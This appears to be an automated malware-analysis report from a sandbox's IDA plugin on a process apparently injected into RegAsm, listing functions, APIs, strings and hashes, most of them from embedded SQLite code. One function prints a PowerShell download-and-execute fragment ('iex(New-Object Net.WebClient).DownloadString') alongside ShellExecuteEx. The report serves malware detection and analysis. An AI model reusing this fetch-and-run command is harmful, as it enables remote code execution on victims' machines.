Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 65685558fe78f14e20d5b9015e74eed0f249af29f68236356a0661e8aed5fe84
Instruction ID: 1bcbcde050c23de1fb54d406b58417d2e3c85a2b774b59f8ae83214eccc13537
Opcode Fuzzy Hash: 65685558fe78f14e20d5b9015e74eed0f249af29f68236356a0661e8aed5fe84
Instruction Fuzzy Hash: 63D1F6B49003869BE718CF24CE85B5B77E4BF44315F28452CE99A9B381E734E544CBA3

Function 192CEF60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

,origin, xrefs: 192CF0D6, 192CF0DE

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ,origin
API String ID: 0-4198660907
Opcode ID: f10208598475edfe493f816bd7151002d4e17db670fc4b845669dcba608f03bc
Instruction ID: 7da2be273e606dec4f48dbc96ba0a4f923e413562c22aaac2bc200b7f841e2c5
Opcode Fuzzy Hash: f10208598475edfe493f816bd7151002d4e17db670fc4b845669dcba608f03bc
Instruction Fuzzy Hash: 9F718DB5504345DFE7109F68C88496AB7F5FF98301F984A2CE98A87261D733E950CB92

Function 19314B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19314C2A
API called with finalized prepared statement, xrefs: 19314C1E
UNIQUE constraint failed: %s.%s, xrefs: 19314BC9
SELECT * FROM %Q.%Q, xrefs: 19314B25
misuse, xrefs: 19314C34
%s at line %d of [%.10s], xrefs: 19314C39
rtree constraint failed: %s.(%s<=%s), xrefs: 19314BF9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: 143d25d0ef27fdbb9a00b6080b03e5372ceb14a481db0e439c822919ca5e301f
Instruction ID: 7655cb2f78876b2c002901b7a8678f71ba5b64378e78f9c84e0524c426a5ab96
Opcode Fuzzy Hash: 143d25d0ef27fdbb9a00b6080b03e5372ceb14a481db0e439c822919ca5e301f
Instruction Fuzzy Hash: 7C412879900255BFF7049F659C88F9B37ACEF40B19F0C4638FD49AA251E721E94486B2

Function 193C7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

%s%c%s, xrefs: 193C7C7A
winFullPathname2, xrefs: 193C7D35
winFullPathname1, xrefs: 193C7CC9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: ec418c7f0d08f90097996462f097171a207e7d38705bdc39f857c0e6625eb40e
Instruction ID: 407fa5db818165672a137cc5898cdfad341e048b73c45ccec5764854d62db5d3
Opcode Fuzzy Hash: ec418c7f0d08f90097996462f097171a207e7d38705bdc39f857c0e6625eb40e
Instruction Fuzzy Hash: 82418DA9A047462BF3229630FC45F7737999F45526F1CC62FFC8B560C1D622ED42C2A2

Function 193BAAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

bind on a busy prepared statement: [%s], xrefs: 193BAB94
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 193BAB0B, 193BAB4C, 193BABA0
API called with NULL prepared statement, xrefs: 193BAAD9
API called with finalized prepared statement, xrefs: 193BAAEF
misuse, xrefs: 193BAB15, 193BAB56, 193BABAA
%s at line %d of [%.10s], xrefs: 193BAB1A, 193BAB5B, 193BABAF

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: d2ef688580aa9c60fe2652a0958618697abf164ebd19b5c1d5b0c2c55b3187ad
Instruction ID: 37cc9121b3dec1368c549b8d550da029327b59962f3c90d829fdf80894e6348e
Opcode Fuzzy Hash: d2ef688580aa9c60fe2652a0958618697abf164ebd19b5c1d5b0c2c55b3187ad
Instruction Fuzzy Hash: 5B41EE74604A04ABE720CB68DC81FD673E9AF40306F4D4569F9AADF2C1E660E981C7A1

Function 00412DD7 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412DDC
memset.MSVCRT ref: 00412DFD
memset.MSVCRT ref: 00412E0B

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

lstrcat.KERNEL32(?,00000000), ref: 00412E37
lstrcat.KERNEL32(?), ref: 00412E55
lstrcat.KERNEL32(?,?), ref: 00412E69
lstrcat.KERNEL32(?), ref: 00412E7C

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040C186: _EH_prolog.MSVCRT ref: 0040C18B
Part of subcall function 0040C186: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
Part of subcall function 0040C186: memcmp.MSVCRT ref: 0040C21C

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 00410F98: GlobalAlloc.KERNEL32(00000000,/A,00000000,00000000,?,00412F0A,?,?), ref: 00410FA3

StrStrA.SHLWAPI(00000000), ref: 00412F16
GlobalFree.KERNEL32(?), ref: 00412FE5

Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295

Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440

lstrcat.KERNEL32(?,00000000), ref: 00412F8B
StrCmpCA.SHLWAPI(?,00426576,?,?,?,?,000003E8), ref: 00412FA8
lstrcat.KERNEL32(?,?), ref: 00412FC1
lstrcat.KERNEL32(?,004268E0), ref: 00412FCF

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 174962345-0
Opcode ID: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
Instruction ID: 16ae336f9ee2c04b565ca64b3f8ee01633a3d4ddb81cadfbdee95fe62696da0d
Opcode Fuzzy Hash: 54fda64b2706fe2e4b1d59de1c4ade093412862ff686ac036716463b3a26dbdf
Instruction Fuzzy Hash: BD613F72D0021DABDF11EBE1DC45DDEBBBDAF18304F00046AF505E3151EA7996988B65

Function 1935ECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON

Download Yara Rule

Strings

docsize, xrefs: 1935F020
content, xrefs: 1935EFDF

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: content$docsize
API String ID: 0-1024698521
Opcode ID: 95e806a0128a0a8cc6cd3a56c9a258c4d4be88c506b514cd8dd04501919fcdb3
Instruction ID: 9f92147e1e27711883784ebedbecc65ec2e8ac93c2d2e0a014d313319650f830
Opcode Fuzzy Hash: 95e806a0128a0a8cc6cd3a56c9a258c4d4be88c506b514cd8dd04501919fcdb3
Instruction Fuzzy Hash: 1CC1B0B1904352ABE720DF24C881F5BB3E4AF88354F5D8628FD4697290D771F945CBA2

Function 0041282B Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 310COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412830

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

ShellExecuteEx.SHELL32(0000003C), ref: 00412BFF

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 0041292C
')", xrefs: 00412950
<, xrefs: 00412BB7
C:\ProgramData\, xrefs: 004129C4
C:\ProgramData\, xrefs: 00412898
.ps1, xrefs: 00412902
*.ps1, xrefs: 00412875
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412995
"" , xrefs: 00412A84

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $')"$*.ps1$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 585178538-2722297100
Opcode ID: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
Instruction ID: 4a9e700a9cdb5e2616cf4f83db54e7418e724996024359a16896e76ceccca2dd
Opcode Fuzzy Hash: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
Instruction Fuzzy Hash: D2D15CB090424DEADB15EBE5C952BDEBBB8AF18308F5040BEE505735C2DA781B4CCB65

Function 192E5470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 192E5697
%lld, xrefs: 192E550D
%!0.15g, xrefs: 192E54D2

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: a0521b148769bdefe55a275a7a2a6490b6ebe0da30cb85b30625fd3ff1992aaf
Instruction ID: 0a4ccf85aa9bd6c8d3ce6ffa5f51f173c551f67fa4153cf4c09e7ec6b4ecb87c
Opcode Fuzzy Hash: a0521b148769bdefe55a275a7a2a6490b6ebe0da30cb85b30625fd3ff1992aaf
Instruction Fuzzy Hash: CF51CFBA5102017FE7209A18DCC1FBB37A6DF87325FAC424DF546462C2FB67B65142A2

Function 19262B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

ABLE x, xrefs: 19262BB6
("%s", xrefs: 19262C4A
,schema HIDDEN, xrefs: 19262CD2
%c"%s", xrefs: 19262C1B
,arg HIDDEN, xrefs: 19262C7A

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: 7a1ee5dd88662ebf3f3d526dc1a287f90048b1d5c8f43dd5ac90c325aa14592c
Instruction ID: 3866f18998534ecf0d39cdb775fdaff13b59e8f3943490ef90fc276a1d512f23
Opcode Fuzzy Hash: 7a1ee5dd88662ebf3f3d526dc1a287f90048b1d5c8f43dd5ac90c325aa14592c
Instruction Fuzzy Hash: 5B71A2749083829BD310DF64C940B5BBBF0FF89304F188A5EF88997651D735E685CB92

Function 0040F689 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F68E
??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
memset.MSVCRT ref: 0040F708
??_V@YAXPAX@Z.MSVCRT ref: 0040F841

Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D

Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
N0ZWFt, xrefs: 0040F7AB, 0040F7B8

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologOpenProcessmemcpymemsetstrlen
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 3050127167-1622206642
Opcode ID: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
Instruction ID: d92978c317b697945912aa173a1e05ead718c9e6d1350f194c4815b503896aae
Opcode Fuzzy Hash: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
Instruction Fuzzy Hash: A8517E71900219AEDB20EB94DC81AEEBBB9EF04314F20017FF114B66C1DB795E88CB59

Function 192DAA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192DAAB8, 192DAD82
API called with NULL prepared statement, xrefs: 192DAA87
API called with finalized prepared statement, xrefs: 192DAA9C, 192DAD76
misuse, xrefs: 192DAAC2, 192DAD8C
%s at line %d of [%.10s], xrefs: 192DAAC7, 192DAD91

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

